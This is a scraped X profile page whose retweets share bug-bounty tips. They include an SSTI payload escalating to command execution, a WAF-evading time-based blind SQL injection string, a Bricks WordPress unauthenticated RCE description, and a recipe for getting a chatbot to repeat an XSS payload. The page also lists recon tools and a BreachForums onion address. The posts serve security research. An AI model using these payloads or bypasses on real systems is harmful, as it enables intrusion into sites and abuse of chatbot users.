Ismail

271 posts

Ismail banner
Ismail

Ismail

@Ismailpy_Crypto

Tanger - Tétouan, Royaume du M Joined Ağustos 2021
332 Following21 Followers
Ismail retweeted
NullSecurityX
NullSecurityX@NullSecurityX·
Unauth RCE in Bricks ≤1.9.6 The /bricks-api/import endpoint allows unauthenticated template imports; attacker-controlled JSON can carry PHP/payloads that the render_element routine processes in an eval‑like manner, resulting in full RCE. #WordPress #RCE #BugBounty
NullSecurityX tweet media
English
4
48
294
11.9K
Ismail retweeted
NullSecurityX
NullSecurityX@NullSecurityX·
🧠 SSTI → Remote Code Execution 1️⃣ App renders user input in template engine 2️⃣ Attacker sends payload: {{7*7}} 3️⃣ Output: 49 → confirms injection 4️⃣ Escalates to: {{self._globals.os.popen('id').read()}} 🎯 Full RCE via template context #bugbounty #ssti #rce #infosec
NullSecurityX tweet media
English
2
45
217
9.1K
Ismail retweeted
🇮🇷 Arshiya🇮🇷
🇮🇷 Arshiya🇮🇷@arshiyaiha·
10 common JavaScript coding vulnerabilities Practical code examples.🐞💻 1- Open Redirect 2-SSRF 3-Timing Attacks 4-prototype pollution 5-NoSQLi 6-ReDoS 7-misconfiguration 8-Hard Code Vulnerability 9-mass assignment 10-Host Header Injection #BugBountyTip youtube.com/watch?v=ypNKKY…
YouTube video
YouTube
English
1
31
165
13K
Ismail retweeted
ProjectDiscovery
ProjectDiscovery@pdiscoveryio·
Define the depth of your crawl with katana's -d flag. The higher the depth, the more recursive crawls and juicy data you get! 🤤 ⚠️ Higher depths can lead to long crawl times against large web applications.
ProjectDiscovery tweet media
English
1
14
66
4.1K
Ismail retweeted
𝕏 Bug Bounty Writeups 𝕏
𝕏 Bug Bounty Writeups 𝕏@bountywriteups·
JShunter JShunter is a command-line tool designed for analyzing JavaScript files and extracting endpoints. This tool specializes in identifying sensitive data, such as API endpoints and potential security vulnerabilities, making it an essential resource for developers, bug bounty and security researchers. github.com/cc1a2b/JShunter
𝕏 Bug Bounty Writeups 𝕏 tweet media
English
3
131
667
31.7K
Ismail retweeted
Dark Web Informer
Dark Web Informer@DarkWebInformer·
Misconfig Mapper: A fast tool to help you uncover security misconfigurations on popular third-party services used by your company and/or bug bounty targets GitHub: github.com/intigriti/misc…
Dark Web Informer tweet mediaDark Web Informer tweet mediaDark Web Informer tweet mediaDark Web Informer tweet media
English
3
50
251
19.4K
Ismail retweeted
VIEH Group
VIEH Group@viehgroup·
Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi
VIEH Group tweet mediaVIEH Group tweet media
English
3
83
503
25.8K
Ismail retweeted
Mike Takahashi
Mike Takahashi@TakSec·
XSS via Prompt Injection 💥🧠🔓 🤖 Find a chatbot 🧠 Ask what model it is 🔁 Get it to repeat text ⚠️ Make it say: '"><img src=x onerror=alert()> 💥 Escalate to Reflected/Stored XSS via URL param
Mike Takahashi tweet media
English
4
57
432
30.3K
Ismail retweeted
Dark Web Informer
Dark Web Informer@DarkWebInformer·
BreachForums has possibly returned at their original Onion address with what looks like it's original data. I verified the Canary with the PGP and it is valid. http://breached26tezcofqla4adzyn22notfqwcac7gpbrleg4usehljwkgqd[.]onion
Dark Web Informer tweet mediaDark Web Informer tweet mediaDark Web Informer tweet media
English
24
82
435
41.5K